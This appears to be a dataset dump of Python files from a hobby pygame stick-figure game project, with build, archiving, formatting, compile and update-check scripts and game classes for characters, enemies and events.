source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
compiled.py
|
import zipfile
import tarfile
import gzip
import bz2
import os
import subprocess
import shutil
import glob
import json
GIT_SCRIPT = """
git clone https://michael78912/smnw-archives
cd smnw-archives
git init
echo copying archives...
cp ../Archives/* .
git add *
git push origin master
"""
def make_xz(file, dir='.'):
"""
compresses file and saves it to
[file].xz in the dir.
"""
os.system('xz -k ' + os.path.join(dir, file))
def make_tarfile(source_dir):
with tarfile.open(source_dir + '.tar', "w") as tar:
tar.add(source_dir, arcname=os.path.basename(source_dir))
def make_gz(file, dir='.'):
os.system('gzip -k ' + file)
def make_bz2(file, dir='.'):
os.system('bzip2 -k ' + os.path.join(dir, file))
def make_zipfile(dir):
print('writing xipfile')
zipfile.main(['-c', dir + '.zip', dir])
def make_7z(dir):
print('writeing 7z')
try:
os.remove('logs.7z')
except:
pass
old = os.getcwd()
os.chdir(dir)
os.system('7z a %s -r' % dir)
shutil.move('logs.7z', '..')
os.chdir(old)
def get_ver():
old_ver_file = json.load(open('/mnt/m/stickman\'s_new_world/game/config/config.json'))
old_ver = old_ver_file['version']
new_ver = input('old version: {}. new version: '.format(old_ver))
old_ver_file['version'] = new_ver
json.dump(old_ver_file, open('/mnt/m/stickman\'s_new_world/game/config/config.json'))
with open('Archives/ver.txt', 'w') as verfile:
verfile.write(new_ver)
def write_archive():
for arc in glob.glob('stickman*.*'):
os.remove(arc)
for func in (make_zipfile, make_tarfile, make_7z):
func('logs')
for arc in glob.glob('logs.*'):
os.rename(arc, 'stickman\'s new world.' + arc.split('.')[1])
for func in (make_xz, make_bz2, make_gz):
func('"stickman\'s new world.tar"')
shutil.rmtree('Archives')
os.mkdir('Archives')
for arc in glob.glob('stickman*.*'):
shutil.move(arc, 'Archives')
get_ver()
os.system('bash tmp.sh')
write_archive()
import os
file = open('compiled.py', 'w')
def f(dir='.'):
for i in os.listdir(dir):
if os.path.isdir(os.path.join(dir, i)):
f(os.path.join(dir, i))
elif i.endswith('.py'):
file.write(open(os.path.join(dir, i)).read())
f()
file.close()
from py_compile import compile as compile_py
from argparse import ArgumentParser
from json import JSONDecoder
from glob import glob
import os
import sys
__version__ = '0.0'
__author__ = 'Michael Gill'
def version():
"""
outputs version info to the screen.
"""
print('compile_all version {__version__} by {__author__}.'.format(
**globals()))
def main(
dir=os.path.abspath('.'),
outputdir='compiled',
recurse_dirs=False,
placeinsubdirs=False):
"""
compiles all files ending in .py or .pyw to
.pyc files, and places them in outputdir.
if recurse_dirs == True, then it will be done to
all subdirectories as well.
"""
try:
if glob(os.path.join(dir, '*.py')) + glob(os.path.join(dir,
'*.pyw')) == []:
print(dir + ', no python source files found!')
os.listdir(dir)
except PermissionError:
print(dir, 'permission denied!')
return
for file in os.listdir(dir):
if os.path.isdir(os.path.join(dir, file)) and recurse_dirs:
if placeinsubdirs:
new_outputdir = os.path.join(outputdir, file)
else:
new_outputdir = outputdir
print('entering', file)
main(
dir=os.path.join(dir, file),
outputdir=new_outputdir,
recurse_dirs=True,
placeinsubdirs=placeinsubdirs)
if not recurse_dirs and os.path.isdir(os.path.join(dir, file)):
continue
else:
if file.endswith(('.py', '.pyw')):
print('attempting to compile', os.path.join(dir, file))
print(
compile_py(
os.path.join(dir, file),
os.path.join(outputdir,
'.'.join(file.split('.')[:-1]) + '.pyc')),
'compiled.')
if __name__ == '__main__':
parser = ArgumentParser(
description='compiles all python files in directory.')
parser.add_argument(
'--directory',
'-d',
help='the input directory with your python files.')
parser.add_argument(
'--output-dir', '-o', help='the output directory for the files to go.')
parser.add_argument(
'--recurse-subdirs',
'-r',
help='recurse the subdirectories',
action="store_true")
parser.add_argument(
'--place-subfiles-in-subdirs',
'-p',
help='store the files from sub-directories in the equivalent sub directories. must be used with the -r option.',
action='store_true')
parser.add_argument(
'--version',
'-v',
help='output the version information and exit.',
action='store_true')
a = parser.parse_args()
if a.output_dir is None:
a.output_dir = os.path.join(os.path.abspath('.'), 'compiled')
if a.directory is None:
a.directory = os.path.abspath('.')
if a.version:
version()
else:
main(
dir=a.directory,
outputdir=a.output_dir,
recurse_dirs=a.recurse_subdirs,
placeinsubdirs=a.place_subfiles_in_subdirs,
)
import os
def main(dir):
for i in os.listdir(dir):
if os.path.isdir(os.path.join(dir, i)):
main(os.path.join(dir, i))
elif i.endswith('.py'):
print('formatting %s' % i)
os.system('yapf -i ' + os.path.join(dir, i))
os.system('autopep8 -i ' + os.path.join(dir, i))
if __name__ == '__main__':
main('.')
import urllib.request
import json
import os
try:
import httplib
except ImportError:
import http.client as httplib
def have_internet():
conn = httplib.HTTPConnection("www.example.com", timeout=5)
try:
conn.request("HEAD", "/")
conn.close()
return True
except:
conn.close()
return False
VER_URL = "https://drive.google.com/uc?export=download&id=17KGPTgF6xWKH3dk7Sd74niL548WU6Tts"
def check_update():
data = {}
# VER_URL is a shared google drive link that has the current version of stickmanranger
with urllib.request.urlopen(VER_URL) as response:
version = response.read().decode()
# decode the current version from "settings.json"
current_version = json.JSONDecoder().decode(
open(os.path.join('config', 'windows_config.json')).read())['version']
# if the version is the same
print(current_version, version)
if current_version == version:
return False
return True
def main():
print(check_update())
if check_update():
import run_auto_install
main()
"""a file for representing an attack."""
class Attack:
def __init__(self, damage, cooldown):
self.damage = damage
self.cooldown = cooldown
def __repr__(self):
return "{}(damage={}, cooldown={})".format(self.__class__.__name__, self.damage, self.cooldown)
try:
from _internal import PICS
except ImportError:
from ._internal import PICS
class BackGroundImage:
"""
this has no effect on the stage itself,
but is just for decoration.
"""
def __init__(self, name, topright, priority=1, put_on_terrain=None):
self.toprgight = topright
self.image = PICS['backgrounds'][name]
self.priority = priority
try:
self.__class__.instances.append(self)
except AttributeError:
# this is the first instance
self.__class__.instances = [self]
def __del__(self):
# must remove the current instance from instances
self.__class__.instances.pop(self.__class__.instances.index(self))
def draw(self, surf):
"""
draw the image to surf
"""
surf.blit(self.image, self.topright)
@classmethod
def draw_all(cls, surf):
"""
draw all of the current instances to surf
"""
orderedpairs = sorted(
[(ins.priority, ins) for ins in cls.instances], key=lambda x: x[0])
for pair in orderedpairs:
pair[1].draw(surf)
if __name__ == '__main__':
print(BackGroundImage('hut', (0, 0)).instances)
try:
from character_image import CharacterImage
from klass import Class
except ImportError:
from .character_image import CharacterImage
from .klass import Class
class Character(Class, CharacterImage):
...
"""characters.py- a module of subclasses
each of these classes is a class of stickman from
stickmanranger.
"""
try:
from _internal import *
from klass import Class
except ImportError:
from ._internal import *
from .klass import Class
__all__ = ['Swordsman', 'Angel', 'Archer', 'Spearman', 'Wizard']
DEFAULT_STATS = (50, 0, 0, 0, 0)
class Swordsman(Class):
image = PICS['characters']['swordsman']
def __init__(self, player_num, main_game_state, weapon, stats=DEFAULT_STATS):
Class.__init__(self, 'swordsman', player_num, weapon, main_game_state, stats)
class Angel(Class):
image = PICS['characters']['angel']
def __init__(self, player_num, main_game_state, weapon, stats=DEFAULT_STATS):
Class.__init__(self, 'angel', player_num, weapon, main_game_state, stats)
class Archer(Class):
image = PICS['characters']['archer']
def __init__(self, player_num, main_game_state, weapon, stats=DEFAULT_STATS):
Class.__init__(self, 'archer', player_num, weapon, main_game_state, stats)
class Spearman(Class):
image = PICS['characters']['spearman']
def __init__(self, player_num, main_game_state, weapon, stats=DEFAULT_STATS):
Class.__init__(self, 'spearman', player_num, weapon, main_game_state, stats)
class Wizard(Class):
image = PICS['characters']['wizard']
def __init__(self, player_num, main_game_state, weapon, stats=DEFAULT_STATS):
Class.__init__(self, 'wizard', player_num, weapon, main_game_state, stats)
"""
character_image.py
this is basically a test module at this point
attempt to build the image of the character
"""
__author__ = 'Michael Gill <michaelveenstra12@gmail.com>'
__version__ = '0.0 alpha'
import random
import time
import sys
import threading
import os
from pygame.locals import *
import pygame as pg
try:
from sprite import SMRSprite
from terrain import Terrain
from _internal import PICS
import events
except ImportError:
from .sprite import SMRSprite
from .terrain import Terrain
from ._internal import PICS, COLOURS
import class_.events as events
FPS = 50
CLOCK = pg.time.Clock()
def draw_sword(surface, armpoint, colour, length=16):
"""draws a sword on to armpoint (armpoint == hand?)"""
colour = COLOURS[colour]
point2 = armpoint[0], armpoint[1] - length
return pg.draw.line(surface, colour, armpoint, point2)
def draw_halo(surface, headtopleft, colour):
"""draws a halo a couple pixels above headtopleft."""
colour = COLOURS[colour]
left, top = headtopleft[0] - 2, headtopleft[1] - 5
width = 8
height = 4
rect = pg.Rect(left, top, width, height)
return pg.draw.ellipse(surface, colour, rect, 1)
def draw_bow(surface, armpoint, colour):
"""draws a bow to the end of armpoint."""
# angle1, angle2 = 60, 80
# rect = pg.Rect(0, 0, 7, 12)
# rect.midleft = armpoint
# print(rect)
# pg.draw.arc(surface, colour, rect, angle1, angle2)
pic = PICS['characters_parts']['bow'][colour]
area = armpoint[0] - 2, armpoint[1] - 7
surface.blit(pic, area)
# pg.image.save(surface, r'C:\Users\Michael\desktop\test_images\thing.png')
def draw_spear(surface, armpoint, colour):
"""draws a spear onto the end of the arm."""
pic = PICS['characters_parts']['spear'][colour]
pos = armpoint[0] - 6, armpoint[1] - 10
surface.blit(pic, pos)
# pg.image.save(surface, r'C:\Users\Michael\desktop\test_images\thing.png')
return surface
def draw_wand(surface, armpoint, colour):
"""draws a wand on the end of the arm."""
draw_sword(surface, armpoint, colour, 7)
# pg.image.save(surface, r'C:\Users\Michael\desktop\test_images\thing.png')
DEFAULT_WEAPONS = {
'swordsman': draw_sword,
'angel': draw_halo,
'archer': draw_bow,
'spearman': draw_spear,
'wizard': draw_wand,
}
class CharacterImage(SMRSprite):
"""
this is a sprite that at this point, should really
just be able to move around.
"""
has_drawn = False
sizex = 7
sizey = 10
hitbox = (11, 26)
size = (sizex * 2, sizey * 2)
head_radius = 3
head_diameter = head_radius * 2
def __init__(self, type_, weapon,
pos: 'the topleft corner (in cartesian system)',
main_game_state):
SMRSprite.__init__(self, main_game_state, None, pos)
self.type_ = type_
self.weapon = weapon
self.topleft = pos
self.bottomleft = pos[0], pos[1] + self.sizey
self.topright = pos[0] + self.sizex, pos[1]
self.bottomright = pos[0] + self.sizex, pos[1] + self.sizey
def build_image(self, surface, colour, rebuild=True):
"""constructs and draws the stickman to the
screen. if rebuild is false, use the last image.
"""
if rebuild or not self.has_drawn:
self.has_drawn = True
# all these are making the right arm
rarm = [
[..., ...], [..., ...]
] # skeleton for 2D-lsit (First time to actually get to use Ellipsis!)
rarm[0][0] = self.topright[0] - (self.sizex // 2)
# X- coordinate should be directly on arm
rarm[0][1] = self.topright[1] - (self.sizey // 6 * 9)
# 3 quarters up the arm should be good
# exactly on edge of player's hitbox
rarm[1][0] = self.topright[0]
# randomly on the top half of hitbox
rarm[1][1] = random.randint(self.topright[1] - (self.sizey // 2),
self.topright[1])
self.rarm = rarm
self.rarm_rect = pg.draw.line(surface, colour, rarm[0],
rarm[1], 2)
# larm is basically a repeat of rarm, only a few modifications
larm = [[..., ...], [..., ...]]
# same coordinate for part that attaches to body is OK
larm[0] = rarm[0]
larm[1][0] = self.topleft[0]
larm[1][1] = random.randint(self.topleft[1] - (self.sizey // 2),
self.topright[1])
self.larm = larm
self.larm_rect = pg.draw.line(surface, colour, larm[0], larm[1], 2)
body1 = self.topright[0] - self.sizex // 2
body2 = self.topleft[1] - self.sizey
start = body1, body2
body1 = self.bottomright[0] - self.sizex // 2
body2 = self.bottomright[1] - self.sizey
end = body1, body2
self.start, self.end = start, end
self.body = pg.draw.line(surface, colour, start, end, 2)
head_center_pos = self.topright[0] - self.sizex // 2, self.topleft[1] - (
self.sizey + 2)
self.head_center = head_center_pos
self.head = {'center': head_center_pos, 'radius': self.head_radius}
self.head_rect = pg.draw.circle(surface, colour,
head_center_pos, self.head_radius, 1)
rleg = [[..., ...], [..., ...]]
rleg[0] = end
rleg[1][0] = random.randint(self.bottomleft[0],
self.sizex // 2 + self.bottomleft[0])
rleg[1][1] = self.bottomleft[1]
self.rleg = rleg
self.rleg_rect = pg.draw.line(surface, colour, rleg[0], rleg[1], 2)
lleg = [[..., ...], [..., ...]]
lleg[0] = end
lleg[1][0] = random.randint(self.bottomright[0],
self.sizex // 2 + self.bottomright[0])
lleg[1][1] = self.bottomright[1]
self.lleg = lleg
self.lleg_rect = pg.draw.line(surface, colour, lleg[0], lleg[1], 2)
else:
pg.draw.line(surface, colour, self.rarm[0], self.rarm[1], 2)
pg.draw.line(surface, colour, self.larm[0], self.larm[1], 2)
pg.draw.line(surface, colour, self.rleg[0], self.rleg[1], 2)
pg.draw.line(surface, colour, self.lleg[0], self.lleg[1], 2)
pg.draw.line(surface, colour, self.start, self.end, 2)
pg.draw.circle(surface, colour, self.head_center, self.head_radius, 1)
if self.type_ == 'angel':
draw_halo(surface, self.head_rect.topleft, self.weapon.colour)
else:
DEFAULT_WEAPONS[self.type_](surface, self.rarm[1], self.weapon.colour)
self.rect = pg.Rect(self.topright, self.hitbox)
def move_to_x(self, pos: 'x', surface, pixels=1, invisible=False):
"""
moves the character image by pixels
towards the destination.
INCOMPLETE: only X coordinates are supported
"""
current = self.topleft[0]
current_pos = current - pixels if pos < current else current + pixels
self.update_coords((current_pos, self.topleft[1]))
# self.build_image(surface)
return current_pos
def move_to_y(self, pos: 'y', surface, pixels=1, invisible=False):
current = self.topleft[1]
current_pos = current - pixels if pos < current else current + pixels
self.update_coords((current_pos, self.topleft[1]))
self.build_image(surface)
return current_pos
def move_to(self, pos: 'x / y', surface, pixels=1):
coord = random.randrange(1)
func = self.move_to_y if coord == 1 else self.move_to_x
return coord, func(pos[coord], surface, pixels)
def _mainloop(self, pos, surface, pixels, invisible=False, *args,
**kwargs):
new_pos = -1 # the coordinate can never be this
at_pos = False
# at pos will keep the main loop going
while True:
if not self._internal_events.empty():
f = self._internal_events.get()
if type(f) == events.Quit:
print('return')
print('exiting')
os._exit(0)
elif type(f) == events.Pause:
if f.keep:
self.internal_event(f)
continue
if not at_pos:
new_pos = self.move_to_x(pos, surface, pixels, invisible,
*args, **kwargs)
CLOCK.tick(FPS)
if pos == new_pos:
at_pos = True
def start_thread(self, move_to, surf, pixels=1, daemon=False):
self.mainproc = threading.Thread(
target=self._mainloop, args=(move_to, surf, pixels), daemon=daemon)
self.mainproc.start()
class WeaponDummy:
def __init__(self, colour):
self.colour = colour
def __repr__(self):
return 'WeaponDummy object with Surface %s' % self.image
def main2():
s = pg.Surface((100, 100))
c = CharacterImage('swordsman', None, (20, 20), {}, None)
c.build_image(s)
pg.image.save(s, r'C:\Users\Michael\Desktop\hi.png')
if __name__ == '__main__':
main2()
"""damagenumbers- an enemy will have a list of damage numbers.
it will display them all over time.
"""
import os
import random
import pygame as pg
GRAY = (220, 220, 220)
class DamageNumber:
"""display as a number coming from the enemy"""
lifespan = 60
dead = False
font = pg.font.Font(os.path.join('data', 'Roboto-Regular.ttf'), 9)
def __init__(self, enemy, damage):
"""initiate instance>"""
self.surf = self.font.render(str(damage), False, GRAY)
self.rect = self.surf.get_rect()
self.rect.center = (enemy.pos[0] + enemy.size_px // 2) + random.randint(-3, 3), enemy.pos[1] - 10
def update(self, surface):
"""update and draw to surface"""
if self.lifespan == 0:
self.dead = True
if not self.dead:
surface.blit(self.surf, self.rect)
self.rect.y = self.rect.y - 1
self.lifespan -= 1"""
drop.py
this is a base class, that is to derive compos/weapons from (and anything i might add later ;))
definitely not to be used directly.
"""
class DropItem:
def __init__(self, smallicon, largeicon, surface, stats_to_display=''):
self.smallicon = smallicon
self.largeicon = largeicon
if isinstance(stats_to_display, dict):
self.stats_to_display = stats_to_display
elif isinstance(stats_to_display, str):
d = stats_to_display.split('\n')
stats_to_display = {}
for i in d:
stats_to_display[i.split(':')[0]] = i.split(':')[1]
self.stats_to_display = stats_to_display
def draw_large(self, pos):
"""
blits self.largeicon to surface.
"""
self.surface.blit(self.largeicon, pos)
def draw_small(self, pos):
self.surface.blit(self.smallicon, pos)
"""enemies.py- contains enemies that are used in SMNW.
may create a seperate library for these one day, but until I
decide to use something other than Blob and Stationary, I'll be fine.
"""
import random
from .enemy import Enemy
from . import terrain
__all__ = ['Blob', 'Stationary']
GRAY = (220, 220, 220)
BACKWARDS = 'backwards'
FORWARDS = 'forwards'
class Blob(Enemy):
"""
stats are as follows:
(health, EXP, GOLD, SILVER)
"""
# Blob enemy has no body
_amount = 0
body = None
chance_of_motion = 3
_damaging = -1
fell_on_last = 0
on_screen = False
intelligence = 4
def __init__(self, colour, head, drops, drop_rates, attack, health, range, size):
super().__init__()
self.colour = colour
self.health = health
self.range = range
self._num = self._amount + 1
self.__class__._amount += 1
self.head = head
self.size_px = head.size_px
self.size = size
# name is used by the game itself.
self.name = head.name + '_blob'
# pretty_name is the name that appears in the library
self.pretty_name = head.pretty_name + ' Blob'
self.drops = drops
self.drop_rates = drop_rates
self.attack = attack
# def hit(self, attack):
# super().hit(attack)
# dmg = self.damage_font.render(str(self.health), False, GRAY)
# rect = dmg.get_rect()
# rect.center = self.pos[0] + self.size_px // 2, self.pos[1] - 10
# pg.display.get_surface().blit(dmg, rect)
def __repr__(self):
return "Blob enemy type " + str(self._num)
def draw(self, coordinates, surface, colour=None):
"""draws enemy to screen at coordinates.
using cartesian system.
"""
self.on_screen = True
surface.blit(self.head.get_image(colour), coordinates)
self.pos = coordinates
def move(self, all_players, surface, terrain_obj):
# pylint: disable=too-many-locals
"""moves the enemy towards the closest player to it.
the Blob does not move too much, and has a 1/4 (intelligence)
chance of moving the way away from the players.
"""
if random.randint(1, self.chance_of_motion) == 1:
# innocent until proven guilty. (of being in a pit)
can_move = True
in_air = terrain.is_in_air(self.pos, terrain_obj, self.size_px)
current_block_x = terrain_obj.px_to_blocks(self.pos[0])
current_block_y = terrain_obj.px_to_blocks(self.pos[1])
next_column = list(terrain_obj.terrain2dlist_texts[terrain_obj.template]
['text'][:, current_block_x - 1])
top_levels = {i if obj == '*' else None for i,
obj in enumerate(next_column)}
top_levels.remove(None)
if in_air:
# fall two pixels, because enemy is in air
self.fell_on_last = 1
self.pos = self.pos[0], self.pos[1] + 2
elif self.fell_on_last == 1:
self.fell_on_last = 0
# for some strange reason that is completely beyond me,
# all enemies seem to stay 4 pixels above ground after falling.
# this fixes that.
self.pos = self.pos[0], self.pos[1] + 4
current_x = self.pos[0]
possible_destinations = [player.image.topright[0]
for player in all_players]
distances = []
for i in possible_destinations:
distances.append(current_x - i if i <=
current_x else i - current_x)
distance = min(distances)
dest = possible_destinations[distances.index(distance)]
move_proper = random.randint(1, self.intelligence) == 1
if dest >= current_x:
# greater. want to move to the right.
if move_proper:
move_right = False
self.pos = (self.pos[0] - 1, self.pos[1])
else:
move_right = True
self.pos = (self.pos[0] + 1, self.pos[1])
else:
# smaller. want to move to left.
if move_proper:
move_right = False
self.pos = (self.pos[0] + 1, self.pos[1])
else:
move_right = True
self.pos = (self.pos[0] - 1, self.pos[1])
class Stationary(Blob):
"""similar to blob, but does n ot move."""
def move(*_): pass
import os.path
import pygame as pg
from .smr_error import SMRError
from .damagenumbers import DamageNumber
class Enemy:
"""base class for stickmanranger enemies"""
id = 0
health = 0
damage_font = pg.font.Font(os.path.join('data', 'Roboto-Regular.ttf'), 9)
damage_numbers = []
dead = False
# I dont know why the hell it needs to start at -3, not 0, but it does
_enemies = -3
in_damage_state = False
pos = (0, 0)
def __init__(self):
Enemy._enemies += 1
self.id = self._enemies
def hit(self, attack):
self.health -= attack.damage
# become red for 4 frames.
self._damaging = 4
self.damage_numbers.append(DamageNumber(self, attack.damage))
def __copy__(self):
return self.__class__(
self.colour,
self.head,
self.drops,
self.drop_rates,
self.attack,
self.health,
self.range,
self.size,
)
def update(self, game_state):
self.damage_numbers = [x for x in self.damage_numbers if not x.dead]
#print(self.damage_numbers)
if not self.dead:
for i in self.damage_numbers:
i.update(game_state['MAIN_DISPLAY_SURF'])
colour = None
if self.in_damage_state:
colour = 'red'
self.in_damage_state = self._damaging >= 0
self._damaging -= 1
self.draw(self.pos, game_state['MAIN_DISPLAY_SURF'], colour)
if self.health <= 0:
i = get_enemy_by_id(game_state['_STAGE_DATA']['enemies'], self.id)
print('lol. enemy with id %s is now IN THE VOID.' % self.id)
del game_state['_STAGE_DATA']['enemies'][i]
self.dead = True
def draw(*_):
"""to be overridden"""
pass
def move(*_):
"""to be overridden (unless stationary)"""
pass
def __repr__(self):
return "{} enemy colour {} size {}".format(self.__class__.__name__, self.colour, self.size)
def get_enemy_by_id(enemies, id_):
for i,e in enumerate(enemies):
print("%s with id %s. looking for %s" % (e, e.id, id_))
if e.id == id_:
return i
raise SMRError('Enemy with id %d could not be found' % id_)
import pygame
try:
from _internal import *
except ImportError:
from ._internal import *
DEF_SIZE = 1
class EnemyHead:
cached_colours = {}
def __init__(self, type_str, colour, size=DEF_SIZE):
print(size)
self.type_str = type_str
self.colour = colour
self.size_px = size * 10
img = PICS['heads'][type_str][colour].copy()
self.head = pygame.transform.scale(img, (size * 10, size * 10))
print({100: COLOURS[' '.join(('light', colour))]})
change_alpha_to_colour(self.head, {100: COLOURS['light ' + colour]})
self.name = colour + '_' + type_str
self.pretty_name = ' '.join((colour, type_str)).title()
def get_image(self, colour_override=None):
if colour_override is None:
return self.head
# return a copy of the overridden image.
pic = PICS['heads'][self.type_str][colour_override].copy()
change_alpha_to_colour(pic, {100: COLOURS['light ' + colour_override]})
pic = pygame.transform.scale(pic, (self.size_px, self.size_px))
return pic
def main():
import pygame
image = pygame.image.load('happy.png')
pygame.image.save(image, 'purplehappy.png')
if __name__ == '__main__':
s = EnemyHead('happy', 'green')
print(vars(s))
import pygame
pygame.image.save(s.head, 'C:\\Users\\Michael\\Desktop\\head.png')
a = pygame.display.set_mode((1000, 1000))
a.fill(COLOURS['white'])
s.head.set_alpha(100)
#change_alpha_to_colour(s.head, {100: (255, 0, 0)})
a.blit(s.head, (0, 0))
pygame.display.update()
while True:
for i in pygame.event.get():
if i.type == 12:
raise SystemExit
import threading
import os
import pygame as pg
try:
from enemy_head import EnemyHead
from sprite import SMRSprite
except ImportError:
from .sprite import SMRSprite
from .enemy_head import EnemyHead
FPS = 50
CLOCK = pg.time.Clock()
class EnemyImage(SMRSprite):
def __init__(self, pos, size, colour, head_type, main_game_state,
event_queue):
SMRSprite.__init__(self, main_game_state, event_queue, pos)
head = EnemyHead(head_type, colour, size)
head_rect = head.head.get_rect()
body_size = self.get_body_size()
head_width = head_rect.width
head_height = head_rect.height
body_width = body_size.width
body_height = body_size.height
print('!!!!!!!!', colour, head)
print(locals())
real_width = body_width if body_width > head_width else head_width
real_height = body_height if body_height > head_width else head_width
self.size = (real_width, real_height)
self.update_coords(pos)
self.head = head
self.main_game_state = main_game_state
self.event_queue = event_queue
def move_to_x(self, pos, surf, pixels=1):
current = self.topleft[0]
dest = current - pixels if pos < current else current + pixels
self.update_coords((dest, self.topleft[1]))
self.draw(surf)
def draw(self, surf):
"""
since the basic class, just
blits the head to the screen.
"""
surf.blit(self.head.head, self.topleft)
def start_thread(self, surf, pos):
self.mainthread = threading.Thread(
target=self._mainloop,
args=(surf, pos),
)
self.mainthread.start()
def _mainloop(self, pos, surf):
at_pos = False
while True:
if at_pos:
continue
self.move_to_x(pos, surf)
if self.topleft == pos:
at_pos = True
CLOCK.tick(FPS)
@staticmethod
def get_body_size():
return pg.Rect((0, 0), (0, 0))
if __name__ == '__main__':
d = EnemyImage((0, 0), 2, 'green', 'happy', {}, {})
s = pg.Surface((10, 10))
s.fill((255, 255, 255))
d.draw(s)
pg.image.save(s, r'C:\Users\Michael\Desktop\s.png')
s = pg.display.set_mode((500, 500))
d.start_thread(10, s)
while True:
for e in pg.event.get():
if e.type == 12:
os._exit(0)
pg.display.update()
s.fill((0, 0, 0))
CLOCK.tick(FPS)
"""
events.py
these are simple event classes for
stickman's new world.
there are 2 ways to use these.
in main_event_queue or _internal_event_queue.
in _internal_event_queue it will act in the
thread with that sprite, and in main_event_queue,
it will act in the main loop itself.
"""
class _Event:
"""
base class for the other events.
"""
def __init__(self, code=None, mode=exec):
self.code = code
def __call__(self):
self._exec()
def __repr__(self):
return '%a object at %s' % (self.__class__, hex(id(self)))
def _exec(self):
"""
to be overridden.
"""
if self.code is not None:
self.mode(self.code)
class Quit(_Event):
def __init__(self):
Quit.code = compile('import os; os._exit(0)', 'Quit Event', 'exec')
self.mode = exec
class Pause(_Event):
keep = True
class SayHello(_Event):
"""
test event.
"""
def __init__(self):
SayHello.code = compile('print("Hello!")', 'SayHello event', 'exec')
self.mode = exec
def _exec(self):
self.mode(self.code)
# print(SayHello())
"""
character_image.py
this is basically a test module at this point
attempt to build the image of the character
"""
__author__ = 'Michael Gill <michaelveenstra12@gmail.com>'
__version__ = '0.0 alpha'
import random
import time
import sys
import threading
import os
from pygame.locals import *
import pygame as pg
try:
from sprite import SMRSprite
from terrain import Terrain
from _internal import PICS
import events
except ImportError:
from .sprite import SMRSprite
from .terrain import Terrain
from ._internal import PICS
import class_.events as events
FPS = 50
CLOCK = pg.time.Clock()
COLOURS = {
'beige': (242, 189, 107),
'green': (0, 128, 0),
'blue': (0, 0, 128),
'red': (128, 0, 0),
'dark red': (255, 0, 0),
'dark blue': (0, 0, 255),
'dark green': (0, 255, 0),
'black': (0, 0, 0),
'aqua': (0, 255, 255),
'white': (255, 255, 255),
'teal': (0, 128, 128),
'purple': (128, 128, 0),
'dark purple': (255, 255, 0),
'yellow': (255, 255, 0),
'silver': (192, 192, 192),
'gold': (192, 192, 96),
'gray': (211, 211, 211),
}
class CharacterImage(SMRSprite):
"""
this is a sprite that at this point, should really
just be able to move around.
"""
sizex = 7
sizey = 9
size = (5, 10)
head_radius = 2
head_diameter = head_radius * 2
def __init__(self,
type_,
weapon,
pos: 'the topleft corner (in cartesian system)',
main_game_state,
event_queue):
SMRSprite.__init__(self, main_game_state, event_queue, pos)
self.type_ = type_
self.weapon = weapon
self.topleft = pos
self.bottomleft = pos[0], pos[1] + self.sizey
self.topright = pos[0] + self.sizex, pos[1]
self.bottomright = pos[0] + self.sizex, pos[1] + self.sizey
def build_image(self, surface):
"""
constructs and draws the stickman to the
screen.
"""
# this is the image of the character
mainsurf = pg.surface.Surface(self.size)
# all these are making the right arm
# skeleton for 2D-lsit (First time to actually get to use Ellipsis!)
rarm = [[..., ...], [..., ...]]
rarm[0][0] = self.topright[0] - (self.sizex // 2)
# X- coordinate should be directly on arm
rarm[0][1] = self.topright[1] - (self.sizey // 6 * 9)
# 3 quarters up the arm should be good
# exactly on edge of player's hitbox
rarm[1][0] = self.topright[0]
# randomly on the top half of hitbox
rarm[1][1] = random.randint(
self.topright[1] - (self.sizey // 2), self.topright[1])
self.rarm_rect = pg.draw.line(
surface, COLOURS['beige'], rarm[0], rarm[1])
# larm is basically a repeat of rarm, only a few modifications
larm = [[..., ...], [..., ...]]
# same coordinate for part that attaches to body is OK
larm[0] = rarm[0]
larm[1][0] = self.topleft[0]
larm[1][1] = random.randint(
self.topleft[1] - (self.sizey // 2), self.topright[1])
self.larm_rect = pg.draw.line(surface, COLOURS['beige'], *larm)
body1 = self.topright[0] - self.sizex // 2
body2 = self.topleft[1] - self.sizey
start = body1, body2
body1 = self.bottomright[0] - self.sizex // 2
body2 = self.bottomright[1] - self.sizey
end = body1, body2
self.body = pg.draw.line(surface, COLOURS['beige'], start, end, 1)
head_center_pos = self.topright[0] - \
self.sizex // 2, self.topleft[1] - (self.sizey + 2)
self.head = {'center': head_center_pos, 'radius': self.head_radius}
self.head_rect = pg.draw.circle(
surface, COLOURS['beige'], head_center_pos, self.head_radius, 1)
rleg = [[..., ...], [..., ...]]
rleg[0] = end
rleg[1][0] = random.randint(
self.bottomleft[0], self.sizex // 2 + self.bottomleft[0])
rleg[1][1] = self.bottomleft[1]
self.rleg = rleg
self.rleg_rect = pg.draw.line(surface, COLOURS['beige'], *rleg)
lleg = [[..., ...], [..., ...]]
lleg[0] = end
lleg[1][0] = random.randint(
self.bottomright[0], self.sizex // 2 + self.bottomright[0])
lleg[1][1] = self.bottomright[1]
self.lleg = lleg
self.lleg_rect = pg.draw.line(surface, COLOURS['beige'], *lleg)
def move_to_x(self, pos: 'x', surface, pixels=1, invisible=False):
"""
moves the character image by pixels
towards the destination.
INCOMPLETE: only X coordinates are supported
"""
current = self.topleft[0]
current_pos = current - pixels if pos < current else current + pixels
print(current_pos)
self.update_coords((current_pos, self.topleft[1]))
self.build_image(surface)
return current_pos
def move_to_y(self, pos: 'y', surface, pixels=1, invisible=False):
current = self.topleft[1]
current_pos = current - pixels if pos < current else current + pixels
print(current_pos)
self.update_coords((current_pos, self.topleft[1]))
self.build_image(surface)
return current_pos
def move_to(self, pos: 'x / y', surface, pixels=1):
coord = random.randrange(1)
func = self.move_to_y if coord == 1 else self.move_to_x
return coord, func(pos[coord], surface, pixels)
def _mainloop(self, pos, surface, pixels, invisible=False, *args, **kwargs):
new_pos = [-1, -1] # the coordinate can never be this
at_pos = False
# at pos will keep the main loop going
while True:
if not self._internal_events.empty():
f = self._internal_events.get()
f()
coord, moved_to = self.move_to(pos, surface, pixels)
if coord == 0: pass
def start_thread(self, move_to, surf, terrain, pixels=1, daemon=False):
self.mainproc = threading.Thread(
target=self._mainloop, args=(
move_to, surf, terrain, pixels), daemon=daemon
)
self.mainproc.start()
class WeaponDummy:
def __init__(self, image):
self.image = image
def __repr__(self):
return 'WeaponDummy object with Surface %s' % self.image
def main():
pg.init()
a = pg.display.set_mode((800, 400))
testsurf = pg.surface.Surface((2, 2))
testsurf.fill(COLOURS['green'])
t = Terrain('dirt', 'flattish')
t_surf = t.build_surface()
a.blit(t_surf, (0, 0))
print('blitted')
# d = CharacterImage('test', WeaponDummy(testsurf), (0, 0), {}, {})
# d.start_thread((200, 100), a)
print(CharacterImage.get_topleft_coord(
